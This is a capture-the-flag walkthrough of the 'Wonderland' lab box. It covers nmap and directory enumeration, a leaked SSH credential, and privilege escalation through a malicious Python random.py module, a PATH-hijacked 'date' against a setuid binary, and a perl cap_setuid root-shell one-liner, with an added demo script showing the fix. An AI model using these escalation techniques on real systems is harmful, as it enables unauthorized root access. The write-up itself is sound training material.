Wonderland
March 12, 2024
Task 1: Capture the flags
# Nmap 7.94 scan initiated Tue Mar 12 13:50:35 2024 as: nmap -sC -sV -oN nmap -vv 10.10.166.115
Nmap scan report for 10.10.166.115
Host is up, received syn-ack (0.30s latency).
Scanned at 2024-03-12 13:50:36 PST for 56s
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDe20sKMgKSMTnyRTmZhXPxn+xLggGUemXZLJDkaGAkZSMgwM3taNTc8OaEku7BvbOkqoIya4ZI8vLuNdMnESFfB22kMWfkoB0zKCSWzaiOjvdMBw559UkLCZ3bgwDY2RudNYq5YEwtqQMFgeRCC1/rO4h4Hl0YjLJufYOoIbK0EPaClcDPYjp+E1xpbn3kqKMhyWDvfZ2ltU1Et2MkhmtJ6TH2HA+eFdyMEQ5SqX6aASSXM7OoUHwJJmptyr2aNeUXiytv7uwWHkIqk3vVrZBXsyjW4ebxC3v0/Oqd73UWd5epuNbYbBNls06YZDVI8wyZ0eYGKwjtogg5+h82rnWN
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHH2gIouNdIhId0iND9UFQByJZcff2CXQ5Esgx1L96L50cYaArAW3A3YP3VDg4tePrpavcPJC2IDonroSEeGj6M=
| 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAsWAdr9g04J7Q8aeiWYg03WjPqGVS6aNf/LF+/hMyKh
80/tcp open http syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 12 13:51:32 2024 -- 1 IP address (1 host up) scanned in 57.45 seconds
The nmap scan shows only two open ports: SSH on 22 and an HTTP service on 80 served by a Go net/http server. Visiting port 80 in the browser shows the following page.

Neither the page itself nor its source contains anything interesting.

Running gobuster against the site reveals a hidden directory:
gobuster dir -u http://10.10.166.115/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster


Gobuster does not recurse into the directories it finds: it reports /r and keeps brute-forcing only the top level. I therefore switched to DirBuster, which does recurse, and it showed that /r is only the first letter of the word "rabbit": the directories nest as /r/a/b/b/i/t.

Visiting that path turns up something interesting.

The page source of /r/a/b/b/i/t contains a credential:
alice:HowDothTheLittleCrocodileImproveHisShiningTail

Trying the credential against the SSH service confirms that it is valid for the user alice:
ssh alice@10.10.166.115

Once logged in, sudo -l lists the commands alice is allowed to run through sudo, and as which users.
The first entry is a Python script that prints some text.

Reading the script itself shows that it imports Python's random library, and sudo -l shows that alice may run the script as the user rabbit.

When Python runs a script, it puts the script's own directory at the front of sys.path, ahead of the standard library. "import random" in /home/alice/walrus_and_the_carpenter.py therefore looks for random.py in /home/alice first and only falls back to the real module if nothing is found there.
Because alice owns /home/alice, we can drop our own random.py into that directory, and since sudo lets alice run the script as rabbit, whatever our module does at import time runs as rabbit. Note that sudo's secure_path does not protect against this: the lookup is Python's module search, not the shell's $PATH.
The following /home/alice/random.py simply spawns a shell when it is imported:
# /home/alice/random.py: imported in place of the standard library module
import os
os.system("/bin/bash")

Running the script as rabbit through sudo now imports our random.py first and drops us into a shell as rabbit:
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

In rabbit's home directory there is a binary called teaParty that runs with the privileges of its owner:
ls
./teaParty

Running it prints a line such as "Probably by Tue, 12 Mar 2024 11:12:01 +0000". Inspecting the binary shows that this line is produced by the command "/bin/echo -n 'Probably by ' && date --date='next hour' -R". The important detail is that date is invoked by its bare name, so it is resolved through $PATH, and the binary does not reset $PATH before running it.

So we create an executable file named date whose contents run /bin/bash; when teaParty invokes date, our file runs with the privileges of teaParty's owner. We create it in /tmp:
vim date
cat date
chmod +x date

Then we put /tmp, where the malicious date lives, at the front of $PATH so it is searched before /bin and /usr/bin:
echo $PATH
export PATH=/tmp:$PATH
echo $PATH

Running teaParty now resolves date to /tmp/date, because /tmp is searched first, and that file spawns /bin/bash as the owner of teaParty.
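As an added example (not part of the original walkthrough), the following shell script rebuilds the teaParty PATH hijack in a throwaway directory. A stand-in script mirrors the recovered date line, a hardened variant shows the fix, and the planted date prints a marker instead of /bin/bash; nothing here is setuid, so the stand-in only reveals which date gets executed. The file names and the functions write_victims and run_with_hijacked_path are my own.

```shell
#!/bin/sh
# Added example, not from the original walkthrough. Reproduces the PATH hijack
# against a stand-in for teaParty, next to a hardened variant. Nothing here is
# setuid; the planted `date` prints a marker instead of spawning /bin/bash.

write_victims() {
    # $1 = directory. victim_vuln mirrors the line recovered from teaParty:
    # date is called by bare name, so $PATH decides which binary runs.
    cat > "$1/victim_vuln" <<'EOF'
#!/bin/sh
/bin/echo -n 'Probably by ' && date --date='next hour' -R
EOF
    # victim_fixed pins PATH to system directories before calling date, so a
    # caller-controlled PATH no longer matters (-u is used because every
    # date(1) accepts it, unlike GNU's --date).
    cat > "$1/victim_fixed" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
/bin/echo -n 'Probably by ' && date -u
EOF
    # The attacker's date, the counterpart of the writeup's /tmp/date.
    cat > "$1/date" <<'EOF'
#!/bin/sh
echo HIJACKED
EOF
    chmod +x "$1/victim_vuln" "$1/victim_fixed" "$1/date"
}

run_with_hijacked_path() {
    # $1 = victim name (victim_vuln or victim_fixed). Runs it with the
    # directory holding the planted date prepended to PATH, exactly what
    # `export PATH=/tmp:$PATH` does in the writeup, and echoes its output.
    dir=$(mktemp -d)
    write_victims "$dir"
    out=$(PATH="$dir:$PATH" "$dir/$1")
    rm -rf "$dir"
    printf '%s\n' "$out"
}
```

run_with_hijacked_path victim_vuln prints "Probably by HIJACKED", while victim_fixed prints the real date no matter what PATH the caller supplies. This is also why the earlier Python step had to go through sys.path rather than $PATH: sudo resets PATH to its secure_path, but a setuid binary that runs a shell command inherits the caller's environment untouched, which is exactly the bug teaParty has.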

WhyIsARavenLikeAWritingDesk?

With the password we found, we SSH in as hatter directly; a real login session is more stable than the shell inherited from the setuid teaParty binary.
ssh hatter@10.10.116.120

Then we run linpeas as usual, and it reports that /usr/bin/perl has the cap_setuid capability set, which lets hatter call setuid() and become any user. The same finding can be confirmed with getcap.
cd /dev/shm
./linpeas.sh | tee peas.txt


GTFOBins has an entry for perl with exactly this capability.

Running it sets the user ID to 0 and gives a root shell:
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

